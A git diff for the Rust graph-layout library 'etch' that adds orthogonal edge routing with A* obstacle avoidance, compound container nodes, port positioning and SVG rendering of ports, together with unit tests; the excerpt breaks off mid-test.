+ assert_eq!(result.nodes.len(), 4); + + let node_s = result.nodes.iter().find(|n| n.id == "S").unwrap(); + let node_leaf = result.nodes.iter().find(|n| n.id == "Leaf").unwrap(); + + assert!(node_s.is_container); + assert!(!node_leaf.is_container); + } + + #[test] + fn layout_is_deterministic() { + let mut g = Graph::new(); + let a = g.add_node("A"); + let b = g.add_node("B"); + let c = g.add_node("C"); + let d = g.add_node("D"); + let e = g.add_node("E"); + g.add_edge(a, b, "ab"); + g.add_edge(a, c, "ac"); + g.add_edge(b, d, "bd"); + g.add_edge(c, d, "cd"); + g.add_edge(d, e, "de"); + + let opts = LayoutOptions::default(); + let first = layout(&g, &simple_node_info, &simple_edge_info, &opts); + + for _ in 0..10 { + let result = layout(&g, &simple_node_info, &simple_edge_info, &opts); + assert_eq!(first.nodes.len(), result.nodes.len()); + for (a, b) in first.nodes.iter().zip(result.nodes.iter()) { + assert_eq!(a.id, b.id); + assert!((a.x - b.x).abs() < 0.001, "x mismatch for {}", a.id); + assert!((a.y - b.y).abs() < 0.001, "y mismatch for {}", a.id); + } + } + } + + #[test] + fn compound_layout_is_deterministic() { + let mut g = Graph::new(); + let _s = g.add_node("S"); + let a = g.add_node("A"); + let b = g.add_node("B"); + let c = g.add_node("C"); + g.add_edge(a, b, "ab"); + g.add_edge(b, c, "bc"); + + let node_info = |_idx: NodeIndex, n: &&str| NodeInfo { + id: n.to_string(), + label: n.to_string(), + node_type: "default".into(), + sublabel: None, + parent: if *n != "S" { Some("S".into()) } else { None }, + ports: vec![], + }; + + let first = layout(&g, &node_info, &simple_edge_info, &LayoutOptions::default()); + + for _ in 0..10 { + let result = layout(&g, &node_info, &simple_edge_info, &LayoutOptions::default()); + for (a, b) in first.nodes.iter().zip(result.nodes.iter()) { + assert_eq!(a.id, b.id); + assert!((a.x - b.x).abs() < 0.001, "x mismatch for {}", a.id); + assert!((a.y - b.y).abs() < 0.001, "y mismatch for {}", a.id); + } + } + } + #[test] fn 
multi_rank_edge_waypoints() { let mut g = Graph::new(); @@ -743,4 +1763,254 @@ mod tests { // A->C spans ranks 0..2, so should have 3 waypoints (start, mid, end). assert_eq!(long_edge.points.len(), 3); } + + // ----------------------------------------------------------------------- + // Port positioning tests + // ----------------------------------------------------------------------- + + #[test] + fn ports_positioned_on_node_sides() { + let mut g = Graph::new(); + let _a = g.add_node("A"); + + let result = layout( + &g, + &|_idx, _n: &&str| NodeInfo { + id: "A".into(), + label: "A".into(), + node_type: "default".into(), + sublabel: None, + parent: None, + ports: vec![ + PortInfo { + id: "in1".into(), + label: "in1".into(), + side: PortSide::Left, + direction: PortDirection::In, + port_type: PortType::Data, + }, + PortInfo { + id: "out1".into(), + label: "out1".into(), + side: PortSide::Right, + direction: PortDirection::Out, + port_type: PortType::Data, + }, + ], + }, + &simple_edge_info, + &LayoutOptions::default(), + ); + + let node = &result.nodes[0]; + assert_eq!(node.ports.len(), 2); + + let in_port = node.ports.iter().find(|p| p.id == "in1").unwrap(); + let out_port = node.ports.iter().find(|p| p.id == "out1").unwrap(); + + // Left port at node's left edge + assert!( + (in_port.x - node.x).abs() < 1.0, + "in1 should be on left edge" + ); + // Right port at node's right edge + assert!( + (out_port.x - (node.x + node.width)).abs() < 1.0, + "out1 should be on right edge" + ); + // Both vertically within the node + assert!(in_port.y > node.y && in_port.y < node.y + node.height); + assert!(out_port.y > node.y && out_port.y < node.y + node.height); + } + + #[test] + fn auto_ports_resolve_by_direction() { + let mut g = Graph::new(); + let _a = g.add_node("A"); + + let result = layout( + &g, + &|_idx, _n: &&str| NodeInfo { + id: "A".into(), + label: "A".into(), + node_type: "default".into(), + sublabel: None, + parent: None, + ports: vec![ + PortInfo { + id: 
"auto_in".into(), + label: "auto_in".into(), + side: PortSide::Auto, + direction: PortDirection::In, + port_type: PortType::Data, + }, + PortInfo { + id: "auto_out".into(), + label: "auto_out".into(), + side: PortSide::Auto, + direction: PortDirection::Out, + port_type: PortType::Event, + }, + ], + }, + &simple_edge_info, + &LayoutOptions::default(), + ); + + let node = &result.nodes[0]; + let in_port = node.ports.iter().find(|p| p.id == "auto_in").unwrap(); + let out_port = node.ports.iter().find(|p| p.id == "auto_out").unwrap(); + + // Auto+In resolves to Left + assert_eq!(in_port.side, PortSide::Left); + assert!((in_port.x - node.x).abs() < 1.0); + // Auto+Out resolves to Right + assert_eq!(out_port.side, PortSide::Right); + assert!((out_port.x - (node.x + node.width)).abs() < 1.0); + } + + #[test] + fn node_grows_for_many_ports() { + let mut g = Graph::new(); + let _a = g.add_node("A"); + + let ports: Vec = (0..6) + .map(|i| PortInfo { + id: format!("p{i}"), + label: format!("port_{i}"), + side: PortSide::Left, + direction: PortDirection::In, + port_type: PortType::Data, + }) + .collect(); + + let result = layout( + &g, + &|_idx, _n: &&str| NodeInfo { + id: "A".into(), + label: "A".into(), + node_type: "default".into(), + sublabel: None, + parent: None, + ports: ports.clone(), + }, + &simple_edge_info, + &LayoutOptions::default(), + ); + + let node = &result.nodes[0]; + // 6 ports * 12px + 8px = 80px > default 50px + assert!( + node.height >= 80.0, + "node should grow for 6 ports, got {}", + node.height + ); + assert_eq!(node.ports.len(), 6); + } + + #[test] + fn edge_connects_to_ports() { + let mut g = Graph::new(); + let a = g.add_node("A"); + let b = g.add_node("B"); + g.add_edge(a, b, "conn"); + + let result = layout( + &g, + &|_idx, n: &&str| NodeInfo { + id: n.to_string(), + label: n.to_string(), + node_type: "default".into(), + sublabel: None, + parent: None, + ports: vec![ + PortInfo { + id: format!("{n}_out"), + label: "out".into(), + side: 
PortSide::Right, + direction: PortDirection::Out, + port_type: PortType::Data, + }, + PortInfo { + id: format!("{n}_in"), + label: "in".into(), + side: PortSide::Left, + direction: PortDirection::In, + port_type: PortType::Data, + }, + ], + }, + &|_idx, _e: &&str| EdgeInfo { + label: "conn".into(), + source_port: Some("A_out".into()), + target_port: Some("B_in".into()), + }, + &LayoutOptions::default(), + ); + + let edge = &result.edges[0]; + assert_eq!(edge.source_port.as_deref(), Some("A_out")); + assert_eq!(edge.target_port.as_deref(), Some("B_in")); + + // Edge start point should be near A's right port + let node_a = result.nodes.iter().find(|n| n.id == "A").unwrap(); + let a_out = node_a.ports.iter().find(|p| p.id == "A_out").unwrap(); + let start = edge.points[0]; + assert!( + (start.0 - a_out.x).abs() < 2.0, + "edge should start at port x" + ); + } + + #[allow(clippy::ptr_arg)] + fn string_node_info(_idx: NodeIndex, label: &String) -> NodeInfo { + NodeInfo { + id: label.clone(), + label: label.clone(), + node_type: "default".into(), + sublabel: None, + parent: None, + ports: vec![], + } + } + + #[allow(clippy::ptr_arg)] + fn string_edge_info(_idx: EdgeIndex, label: &String) -> EdgeInfo { + EdgeInfo { + label: label.clone(), + source_port: None, + target_port: None, + } + } + + #[test] + fn budget_exceeded_returns_sentinel() { + let mut g: Graph = Graph::new(); + for i in 0..10 { + g.add_node(format!("N-{i}")); + } + let opts = LayoutOptions { + max_nodes: Some(5), + ..Default::default() + }; + let result = layout(&g, &string_node_info, &string_edge_info, &opts); + assert_eq!(result.nodes.len(), 1); + assert_eq!(result.nodes[0].id, "__budget_exceeded__"); + assert!(result.nodes[0].label.contains("10 nodes")); + assert!(result.edges.is_empty()); + } + + #[test] + fn budget_allows_within_limit() { + let mut g: Graph = Graph::new(); + for i in 0..5 { + g.add_node(format!("N-{i}")); + } + let opts = LayoutOptions { + max_nodes: Some(10), + ..Default::default() + 
}; + let result = layout(&g, &string_node_info, &string_edge_info, &opts); + assert_eq!(result.nodes.len(), 5); + } } diff --git a/etch/src/lib.rs b/etch/src/lib.rs index e37427b..f8a343b 100644 --- a/etch/src/lib.rs +++ b/etch/src/lib.rs @@ -25,8 +25,8 @@ //! //! let gl = layout( //! &g, -//! &|_idx, n| NodeInfo { id: n.to_string(), label: n.to_string(), node_type: "default".into(), sublabel: None }, -//! &|_idx, e| EdgeInfo { label: e.to_string() }, +//! &|_idx, n| NodeInfo { id: n.to_string(), label: n.to_string(), node_type: "default".into(), sublabel: None, parent: None, ports: vec![] }, +//! &|_idx, e| EdgeInfo { label: e.to_string(), source_port: None, target_port: None }, //! &LayoutOptions::default(), //! ); //! @@ -35,5 +35,7 @@ //! ``` pub mod filter; +pub mod html; pub mod layout; +pub mod ortho; pub mod svg; diff --git a/etch/src/ortho.rs b/etch/src/ortho.rs new file mode 100644 index 0000000..3bb5c7b --- /dev/null +++ b/etch/src/ortho.rs @@ -0,0 +1,422 @@ +//! Orthogonal edge routing with obstacle avoidance. +//! +//! Routes edges as sequences of horizontal and vertical line segments, +//! avoiding node rectangles. Uses a simplified visibility-graph approach: +//! +//! 1. Build padded obstacle rectangles from all nodes. +//! 2. Generate candidate waypoints at obstacle corners. +//! 3. Find shortest orthogonal path using A* with bend penalty. + +use std::cmp::Ordering; +use std::collections::{BinaryHeap, HashMap}; + +use crate::layout::LayoutNode; + +/// Padding around obstacle rectangles (px). +const OBSTACLE_PADDING: f64 = 6.0; + +/// An axis-aligned rectangle used as an obstacle. 
+#[derive(Debug, Clone, Copy)] +struct Rect { + x1: f64, + y1: f64, + x2: f64, + y2: f64, +} + +impl Rect { + fn contains(&self, x: f64, y: f64) -> bool { + x >= self.x1 && x <= self.x2 && y >= self.y1 && y <= self.y2 + } + + fn intersects_segment(&self, ax: f64, ay: f64, bx: f64, by: f64) -> bool { + // Check if horizontal or vertical segment intersects this rectangle + if (ay - by).abs() < 0.001 { + // Horizontal segment + let y = ay; + if y < self.y1 || y > self.y2 { + return false; + } + let min_x = ax.min(bx); + let max_x = ax.max(bx); + min_x < self.x2 && max_x > self.x1 + } else if (ax - bx).abs() < 0.001 { + // Vertical segment + let x = ax; + if x < self.x1 || x > self.x2 { + return false; + } + let min_y = ay.min(by); + let max_y = ay.max(by); + min_y < self.y2 && max_y > self.y1 + } else { + false // Non-axis-aligned segments not handled + } + } +} + +/// A* node for orthogonal pathfinding. +#[derive(Debug, Clone)] +struct PathNode { + x: f64, + y: f64, + cost: f64, + /// Direction of the segment leading to this node (for bend penalty). + /// 0 = start, 1 = horizontal, 2 = vertical + dir: u8, +} + +impl PartialEq for PathNode { + fn eq(&self, other: &Self) -> bool { + self.cost == other.cost + } +} + +impl Eq for PathNode {} + +impl PartialOrd for PathNode { + fn partial_cmp(&self, other: &Self) -> Option { + Some(self.cmp(other)) + } +} + +impl Ord for PathNode { + fn cmp(&self, other: &Self) -> Ordering { + // Reverse ordering for min-heap + other + .cost + .partial_cmp(&self.cost) + .unwrap_or(Ordering::Equal) + } +} + +/// Discretize a coordinate for use as HashMap key. +fn grid_key(x: f64, y: f64) -> (i64, i64) { + ((x * 100.0) as i64, (y * 100.0) as i64) +} + +/// Route an edge orthogonally from `src` to `tgt`, avoiding obstacles. +/// +/// Returns a list of waypoints where all consecutive pairs form +/// horizontal or vertical segments. 
+pub fn route_orthogonal( + nodes: &[LayoutNode], + src: (f64, f64), + tgt: (f64, f64), + bend_penalty: f64, + _port_stub_length: f64, +) -> Vec<(f64, f64)> { + // Trivial case: same point + if (src.0 - tgt.0).abs() < 0.001 && (src.1 - tgt.1).abs() < 0.001 { + return vec![src]; + } + + // If source and target share an axis, try direct line + let obstacles = build_obstacles(nodes); + + if can_route_direct(&obstacles, src, tgt) { + return if (src.0 - tgt.0).abs() < 0.001 || (src.1 - tgt.1).abs() < 0.001 { + vec![src, tgt] + } else { + // One bend: go horizontal then vertical + let mid = (tgt.0, src.1); + if !segment_blocked(&obstacles, src.0, src.1, mid.0, mid.1) + && !segment_blocked(&obstacles, mid.0, mid.1, tgt.0, tgt.1) + { + vec![src, mid, tgt] + } else { + let mid2 = (src.0, tgt.1); + if !segment_blocked(&obstacles, src.0, src.1, mid2.0, mid2.1) + && !segment_blocked(&obstacles, mid2.0, mid2.1, tgt.0, tgt.1) + { + vec![src, mid2, tgt] + } else { + route_with_astar(&obstacles, src, tgt, bend_penalty) + } + } + }; + } + + route_with_astar(&obstacles, src, tgt, bend_penalty) +} + +fn build_obstacles(nodes: &[LayoutNode]) -> Vec { + nodes + .iter() + .map(|n| Rect { + x1: n.x - OBSTACLE_PADDING, + y1: n.y - OBSTACLE_PADDING, + x2: n.x + n.width + OBSTACLE_PADDING, + y2: n.y + n.height + OBSTACLE_PADDING, + }) + .collect() +} + +fn can_route_direct(obstacles: &[Rect], src: (f64, f64), tgt: (f64, f64)) -> bool { + // Direct horizontal or vertical line + if (src.0 - tgt.0).abs() < 0.001 || (src.1 - tgt.1).abs() < 0.001 { + return !segment_blocked(obstacles, src.0, src.1, tgt.0, tgt.1); + } + false +} + +fn segment_blocked(obstacles: &[Rect], x1: f64, y1: f64, x2: f64, y2: f64) -> bool { + obstacles + .iter() + .any(|r| r.intersects_segment(x1, y1, x2, y2)) +} + +fn route_with_astar( + obstacles: &[Rect], + src: (f64, f64), + tgt: (f64, f64), + bend_penalty: f64, +) -> Vec<(f64, f64)> { + // Generate candidate waypoints from obstacle corners + src/tgt + let mut 
candidates: Vec<(f64, f64)> = vec![src, tgt]; + + for r in obstacles { + // Add corner points (slightly outside the obstacle) + candidates.push((r.x1, r.y1)); + candidates.push((r.x2, r.y1)); + candidates.push((r.x1, r.y2)); + candidates.push((r.x2, r.y2)); + } + + // Also add axis-aligned projections of src/tgt through obstacle corners + for r in obstacles { + candidates.push((src.0, r.y1)); + candidates.push((src.0, r.y2)); + candidates.push((r.x1, src.1)); + candidates.push((r.x2, src.1)); + candidates.push((tgt.0, r.y1)); + candidates.push((tgt.0, r.y2)); + candidates.push((r.x1, tgt.1)); + candidates.push((r.x2, tgt.1)); + } + + // Filter out candidates inside obstacles + candidates.retain(|&(x, y)| !obstacles.iter().any(|r| r.contains(x, y))); + + // Deduplicate + candidates.sort_by(|a, b| { + a.0.partial_cmp(&b.0) + .unwrap_or(Ordering::Equal) + .then(a.1.partial_cmp(&b.1).unwrap_or(Ordering::Equal)) + }); + candidates.dedup_by(|a, b| (a.0 - b.0).abs() < 0.01 && (a.1 - b.1).abs() < 0.01); + + // A* search + let src_key = grid_key(src.0, src.1); + let tgt_key = grid_key(tgt.0, tgt.1); + + let mut heap = BinaryHeap::new(); + type GridKey = (i64, i64); + // (cost, direction, predecessor) + let mut best: HashMap)> = HashMap::new(); + + heap.push(PathNode { + x: src.0, + y: src.1, + cost: 0.0, + dir: 0, + }); + best.insert(src_key, (0.0, 0, None)); + + while let Some(current) = heap.pop() { + let cur_key = grid_key(current.x, current.y); + + if cur_key == tgt_key { + break; + } + + if let Some(&(best_cost, _, _)) = best.get(&cur_key) + && current.cost > best_cost + 0.001 + { + continue; + } + + // Try reaching each candidate via orthogonal segment + for &(cx, cy) in &candidates { + let c_key = grid_key(cx, cy); + if c_key == cur_key { + continue; + } + + // Must share an axis (orthogonal move) + let is_horizontal = (current.y - cy).abs() < 0.01; + let is_vertical = (current.x - cx).abs() < 0.01; + + if !is_horizontal && !is_vertical { + continue; + } + + // Check 
if segment is blocked + if segment_blocked(obstacles, current.x, current.y, cx, cy) { + continue; + } + + let dir = if is_horizontal { 1 } else { 2 }; + let dist = if is_horizontal { + (current.x - cx).abs() + } else { + (current.y - cy).abs() + }; + + let bend_cost = if current.dir != 0 && current.dir != dir { + bend_penalty + } else { + 0.0 + }; + + let new_cost = current.cost + dist + bend_cost; + + let is_better = match best.get(&c_key) { + Some(&(prev_cost, _, _)) => new_cost < prev_cost - 0.001, + None => true, + }; + + if is_better { + best.insert(c_key, (new_cost, dir, Some(cur_key))); + heap.push(PathNode { + x: cx, + y: cy, + cost: new_cost, + dir, + }); + } + } + } + + // Reconstruct path + let mut path = Vec::new(); + let mut key = tgt_key; + + loop { + match best.get(&key) { + Some(&(_, _, Some(prev))) => { + // Find the point for this key + let (x, y) = (key.0 as f64 / 100.0, key.1 as f64 / 100.0); + path.push((x, y)); + key = prev; + } + _ => { + path.push(src); + break; + } + } + } + + path.reverse(); + + // If path is empty or single point, fallback to L-shaped route + if path.len() < 2 { + let mid = (tgt.0, src.1); + return vec![src, mid, tgt]; + } + + path +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::layout::LayoutNode; + + fn make_node(id: &str, x: f64, y: f64, w: f64, h: f64) -> LayoutNode { + LayoutNode { + id: id.into(), + x, + y, + width: w, + height: h, + rank: 0, + label: id.into(), + node_type: "default".into(), + sublabel: None, + is_container: false, + ports: vec![], + } + } + + #[test] + fn direct_vertical_no_obstacles() { + let nodes = vec![]; + let path = route_orthogonal(&nodes, (100.0, 0.0), (100.0, 200.0), 20.0, 10.0); + assert_eq!(path.len(), 2); + assert!((path[0].0 - 100.0).abs() < 0.1); + assert!((path[1].0 - 100.0).abs() < 0.1); + } + + #[test] + fn direct_horizontal_no_obstacles() { + let nodes = vec![]; + let path = route_orthogonal(&nodes, (0.0, 100.0), (200.0, 100.0), 20.0, 10.0); + assert_eq!(path.len(), 
2); + } + + #[test] + fn l_shaped_no_obstacles() { + let nodes = vec![]; + let path = route_orthogonal(&nodes, (0.0, 0.0), (200.0, 200.0), 20.0, 10.0); + // Should have one bend (3 points) + assert!(path.len() >= 2); + // All segments orthogonal + for w in path.windows(2) { + let dx = (w[0].0 - w[1].0).abs(); + let dy = (w[0].1 - w[1].1).abs(); + assert!( + dx < 0.1 || dy < 0.1, + "non-orthogonal: ({},{})->({},{})", + w[0].0, + w[0].1, + w[1].0, + w[1].1 + ); + } + } + + #[test] + fn routes_around_obstacle() { + // Node B sits between src and tgt + let nodes = vec![make_node("B", 90.0, 90.0, 20.0, 20.0)]; + let path = route_orthogonal(&nodes, (100.0, 50.0), (100.0, 150.0), 20.0, 10.0); + + // Path should avoid the obstacle (more than 2 points) + assert!( + path.len() >= 3, + "should route around obstacle, got {} points", + path.len() + ); + + // All segments orthogonal + for w in path.windows(2) { + let dx = (w[0].0 - w[1].0).abs(); + let dy = (w[0].1 - w[1].1).abs(); + assert!(dx < 0.1 || dy < 0.1, "non-orthogonal segment"); + } + } + + #[test] + fn all_segments_orthogonal() { + let nodes = vec![ + make_node("A", 0.0, 0.0, 80.0, 40.0), + make_node("B", 200.0, 0.0, 80.0, 40.0), + make_node("C", 100.0, 100.0, 80.0, 40.0), + ]; + let path = route_orthogonal(&nodes, (80.0, 20.0), (200.0, 120.0), 20.0, 10.0); + + for w in path.windows(2) { + let dx = (w[0].0 - w[1].0).abs(); + let dy = (w[0].1 - w[1].1).abs(); + assert!( + dx < 0.1 || dy < 0.1, + "non-orthogonal: ({:.1},{:.1})->({:.1},{:.1})", + w[0].0, + w[0].1, + w[1].0, + w[1].1 + ); + } + } +} diff --git a/etch/src/svg.rs b/etch/src/svg.rs index 7700e26..d5d4d8f 100644 --- a/etch/src/svg.rs +++ b/etch/src/svg.rs @@ -70,7 +70,9 @@ pub fn render_svg(layout: &GraphLayout, options: &SvgOptions) -> String { let vb_w = layout.width + pad * 2.0; let vb_h = layout.height + pad * 2.0; - let mut svg = String::with_capacity(4096); + // Estimate ~500 bytes per node + ~200 bytes per edge + base overhead. 
+ let estimated = 2048 + layout.nodes.len() * 500 + layout.edges.len() * 200; + let mut svg = String::with_capacity(estimated); // Opening tag. writeln!( @@ -149,7 +151,16 @@ fn write_style(svg: &mut String, options: &SvgOptions) { \x20 .edge text {{ font-family: {font}; font-size: {}px; \ fill: #555; text-anchor: middle; dominant-baseline: central; \ font-weight: 500; }}\n\ + \x20 .node.container rect {{ stroke-dasharray: 4 2; }}\n\ \x20 .node:hover rect {{ filter: brightness(0.92); }}\n\ + \x20 .port circle {{ stroke: #333; stroke-width: 0.8; }}\n\ + \x20 .port.data circle {{ fill: #4a90d9; }}\n\ + \x20 .port.event circle {{ fill: #e67e22; }}\n\ + \x20 .port.event-data circle {{ fill: #27ae60; }}\n\ + \x20 .port.access circle {{ fill: #999; }}\n\ + \x20 .port.group circle {{ fill: #9b59b6; }}\n\ + \x20 .port.abstract circle {{ fill: #666; }}\n\ + \x20 .port text {{ font-size: 9px; fill: #444; dominant-baseline: central; }}\n\ \x20 \n", fs - 2.0, fs - 2.0, @@ -212,7 +223,13 @@ fn write_nodes(svg: &mut String, layout: &GraphLayout, options: &SvgOptions) { let default_fill = "#e8e8e8".to_string(); - for node in &layout.nodes { + // Draw containers first (background), then leaf nodes on top. + let containers: Vec<&crate::layout::LayoutNode> = + layout.nodes.iter().filter(|n| n.is_container).collect(); + let leaves: Vec<&crate::layout::LayoutNode> = + layout.nodes.iter().filter(|n| !n.is_container).collect(); + + for node in containers.iter().chain(leaves.iter()) { let fill = options .type_colors .get(&node.node_type) @@ -226,9 +243,10 @@ fn write_nodes(svg: &mut String, layout: &GraphLayout, options: &SvgOptions) { } } + let class_suffix = if node.is_container { " container" } else { "" }; writeln!( svg, - " ", + " ", css_class_safe(&node.node_type), ) .unwrap(); @@ -236,44 +254,146 @@ fn write_nodes(svg: &mut String, layout: &GraphLayout, options: &SvgOptions) { // Rectangle. 
let r = options.rounded_corners; let is_highlighted = options.highlight.as_ref().is_some_and(|h| h == &node.id); - let stroke_w = if is_highlighted { "3.0" } else { "1.5" }; + let stroke_w = if is_highlighted { + "3.0" + } else if node.is_container { + "2.0" + } else { + "1.5" + }; let stroke_c = if is_highlighted { "#ff6600" } else { "#333" }; + let container_fill = if node.is_container { + // Lighten container fill for better contrast with children. + lighten_color(fill) + } else { + fill.to_string() + }; writeln!( svg, " ", + rx=\"{r}\" ry=\"{r}\" fill=\"{container_fill}\" stroke=\"{stroke_c}\" stroke-width=\"{stroke_w}\" />", node.x, node.y, node.width, node.height, ) .unwrap(); - // Primary label. - let text_y = if node.sublabel.is_some() { - node.y + node.height / 2.0 - options.font_size * 0.45 + if node.is_container { + // Container: label in header bar. + let header_y = node.y + options.font_size + 4.0; + writeln!( + svg, + " {}", + node.x + node.width / 2.0, + xml_escape(&node.label), + ) + .unwrap(); + if let Some(ref sub) = node.sublabel { + let sub_y = header_y + options.font_size; + writeln!( + svg, + " {}", + node.x + node.width / 2.0, + xml_escape(sub), + ) + .unwrap(); + } } else { - node.y + node.height / 2.0 - }; - writeln!( - svg, - " {}", - node.x + node.width / 2.0, - xml_escape(&node.label), - ) - .unwrap(); - - // Sublabel. - if let Some(ref sub) = node.sublabel { - let sub_y = node.y + node.height / 2.0 + options.font_size * 0.65; + // Leaf node: label centered. 
+ let text_y = if node.sublabel.is_some() { + node.y + node.height / 2.0 - options.font_size * 0.45 + } else { + node.y + node.height / 2.0 + }; writeln!( svg, - " {}", + " {}", node.x + node.width / 2.0, - xml_escape(sub), + xml_escape(&node.label), + ) + .unwrap(); + if let Some(ref sub) = node.sublabel { + let sub_y = node.y + node.height / 2.0 + options.font_size * 0.65; + writeln!( + svg, + " {}", + node.x + node.width / 2.0, + xml_escape(sub), + ) + .unwrap(); + } + } + + // Ports. + for port in &node.ports { + let port_class = match port.port_type { + crate::layout::PortType::Data => "data", + crate::layout::PortType::Event => "event", + crate::layout::PortType::EventData => "event-data", + crate::layout::PortType::Access => "access", + crate::layout::PortType::Group => "group", + crate::layout::PortType::Abstract => "abstract", + }; + writeln!( + svg, + " ", + xml_escape(&port.id), + ) + .unwrap(); + // Port circle + writeln!( + svg, + " ", + port.x, port.y, ) .unwrap(); + // Direction indicator (small triangle) + let tri = match port.direction { + crate::layout::PortDirection::In => { + // Inward-pointing triangle + match port.side { + crate::layout::PortSide::Left => { + format!("M {} {} l 4 -2.5 l 0 5 Z", port.x + 4.0, port.y) + } + crate::layout::PortSide::Right => { + format!("M {} {} l -4 -2.5 l 0 5 Z", port.x - 4.0, port.y) + } + _ => String::new(), + } + } + crate::layout::PortDirection::Out => { + // Outward-pointing triangle + match port.side { + crate::layout::PortSide::Left => { + format!("M {} {} l -4 -2.5 l 0 5 Z", port.x - 4.0, port.y) + } + crate::layout::PortSide::Right => { + format!("M {} {} l 4 -2.5 l 0 5 Z", port.x + 4.0, port.y) + } + _ => String::new(), + } + } + crate::layout::PortDirection::InOut => String::new(), + }; + if !tri.is_empty() { + writeln!(svg, " ").unwrap(); + } + // Port label + let (lx, anchor) = match port.side { + crate::layout::PortSide::Left => (port.x + 6.0, "start"), + crate::layout::PortSide::Right => (port.x 
- 6.0, "end"), + _ => (port.x, "middle"), + }; + writeln!( + svg, + " {}", + port.y, + xml_escape(&port.label), + ) + .unwrap(); + svg.push_str(" \n"); } // Tooltip. - writeln!(svg, " {}", xml_escape(&node.id),).unwrap(); + writeln!(svg, " {}", xml_escape(&node.id)).unwrap(); svg.push_str(" \n"); } @@ -281,6 +401,26 @@ fn write_nodes(svg: &mut String, layout: &GraphLayout, options: &SvgOptions) { svg.push_str(" \n"); } +/// Lighten a hex color for container backgrounds (add transparency effect). +fn lighten_color(hex: &str) -> String { + if !hex.starts_with('#') || hex.len() < 7 { + return format!("{hex}40"); // fallback: add alpha + } + let r = u8::from_str_radix(&hex[1..3], 16).unwrap_or(200); + let g = u8::from_str_radix(&hex[3..5], 16).unwrap_or(200); + let b = u8::from_str_radix(&hex[5..7], 16).unwrap_or(200); + // Blend toward white by 70%. + let lr = r as u16 + (255 - r as u16) * 70 / 100; + let lg = g as u16 + (255 - g as u16) * 70 / 100; + let lb = b as u16 + (255 - b as u16) * 70 / 100; + format!( + "#{:02x}{:02x}{:02x}", + lr.min(255) as u8, + lg.min(255) as u8, + lb.min(255) as u8 + ) +} + /// Build a smooth cubic bezier SVG path through the given waypoints. /// /// For two points this produces a straight line (`M ... L ...`). @@ -291,11 +431,24 @@ fn build_bezier_path(points: &[(f64, f64)]) -> String { let (x0, y0) = points[0]; write!(d, "M {x0} {y0}").unwrap(); - if points.len() == 2 { + // Check if all segments are axis-aligned (orthogonal routing) + let is_orthogonal = points.len() >= 2 + && points.windows(2).all(|w| { + let dx = (w[0].0 - w[1].0).abs(); + let dy = (w[0].1 - w[1].1).abs(); + dx < 0.1 || dy < 0.1 + }); + + if is_orthogonal { + // Polyline with straight segments (L commands) + for &(x, y) in &points[1..] { + write!(d, " L {x} {y}").unwrap(); + } + } else if points.len() == 2 { let (x1, y1) = points[1]; write!(d, " L {x1} {y1}").unwrap(); } else { - // Simple cubic bezier: for each segment use vertical tangent handles. 
+ // Cubic bezier: for each segment use vertical tangent handles. for i in 0..points.len() - 1 { let (x1, y1) = points[i]; let (x2, y2) = points[i + 1]; @@ -336,7 +489,9 @@ fn css_class_safe(s: &str) -> String { #[cfg(test)] mod tests { use super::*; - use crate::layout::{EdgeInfo, LayoutOptions, NodeInfo, layout}; + use crate::layout::{ + EdgeInfo, LayoutOptions, NodeInfo, PortDirection, PortInfo, PortSide, PortType, layout, + }; use petgraph::Graph; use petgraph::graph::{EdgeIndex, NodeIndex}; @@ -353,9 +508,13 @@ mod tests { label: n.to_string(), node_type: "req".into(), sublabel: Some("Title".into()), + parent: None, + ports: vec![], }, &|_idx: EdgeIndex, e: &&str| EdgeInfo { label: e.to_string(), + source_port: None, + target_port: None, }, &LayoutOptions::default(), ) @@ -452,6 +611,188 @@ mod tests { assert!(svg.contains("B")); } + #[test] + fn svg_compound_container_rendering() { + // Build a compound graph and verify container SVG output. + let mut g = Graph::new(); + let _s = g.add_node("System"); + let a = g.add_node("A"); + let b = g.add_node("B"); + g.add_edge(a, b, "conn"); + + let gl = layout( + &g, + &|_idx: NodeIndex, n: &&str| NodeInfo { + id: n.to_string(), + label: n.to_string(), + node_type: "system".into(), + sublabel: None, + parent: if *n == "A" || *n == "B" { + Some("System".into()) + } else { + None + }, + ports: vec![], + }, + &|_idx: EdgeIndex, e: &&str| EdgeInfo { + label: e.to_string(), + source_port: None, + target_port: None, + }, + &LayoutOptions::default(), + ); + + let mut colors = HashMap::new(); + colors.insert("system".into(), "#4a90d9".into()); + let svg = render_svg( + &gl, + &SvgOptions { + type_colors: colors, + ..Default::default() + }, + ); + + // Container should have the "container" CSS class. + assert!( + svg.contains("container"), + "SVG should contain 'container' class" + ); + // Container should use dashed stroke style (from CSS). + assert!(svg.contains("stroke-dasharray")); + // Container label should be bold. 
+ assert!(svg.contains("font-weight=\"bold\"")); + // Container fill should be lightened (not the original color). + assert!( + !svg.contains("fill=\"#4a90d9\"") || svg.contains("font-weight=\"bold\""), + "Container fill should be lightened" + ); + } + + #[test] + fn lighten_color_basic() { + let result = lighten_color("#000000"); + // Black lightened 70% toward white should be ~#b3b3b3. + assert_eq!(result, "#b2b2b2"); + + let result = lighten_color("#ffffff"); + // White stays white. + assert_eq!(result, "#ffffff"); + + let result = lighten_color("#ff0000"); + // Red channel stays 255, G and B go up. + assert!(result.starts_with("#ff")); + } + + #[test] + fn svg_orthogonal_edges_use_line_commands() { + let mut g = Graph::new(); + let a = g.add_node("A"); + let b = g.add_node("B"); + g.add_edge(a, b, "ab"); + + let gl = layout( + &g, + &|_idx: NodeIndex, n: &&str| NodeInfo { + id: n.to_string(), + label: n.to_string(), + node_type: "default".into(), + sublabel: None, + parent: None, + ports: vec![], + }, + &|_idx: EdgeIndex, e: &&str| EdgeInfo { + label: e.to_string(), + source_port: None, + target_port: None, + }, + &LayoutOptions { + edge_routing: crate::layout::EdgeRouting::Orthogonal, + ..Default::default() + }, + ); + + let svg = render_svg(&gl, &SvgOptions::default()); + // Orthogonal edges should use L (line-to) commands, not C (cubic) + assert!( + svg.contains(" L "), + "orthogonal edges should use L commands" + ); + // Should NOT contain C commands for orthogonal edges + assert!( + !svg.contains(" C "), + "orthogonal edges should not use C (bezier) commands" + ); + } + + #[test] + fn svg_renders_ports() { + let mut g = Graph::new(); + let _a = g.add_node("A"); + + let gl = layout( + &g, + &|_idx: NodeIndex, _n: &&str| NodeInfo { + id: "A".into(), + label: "A".into(), + node_type: "default".into(), + sublabel: None, + parent: None, + ports: vec![ + PortInfo { + id: "data_in".into(), + label: "data_in".into(), + side: PortSide::Left, + direction: 
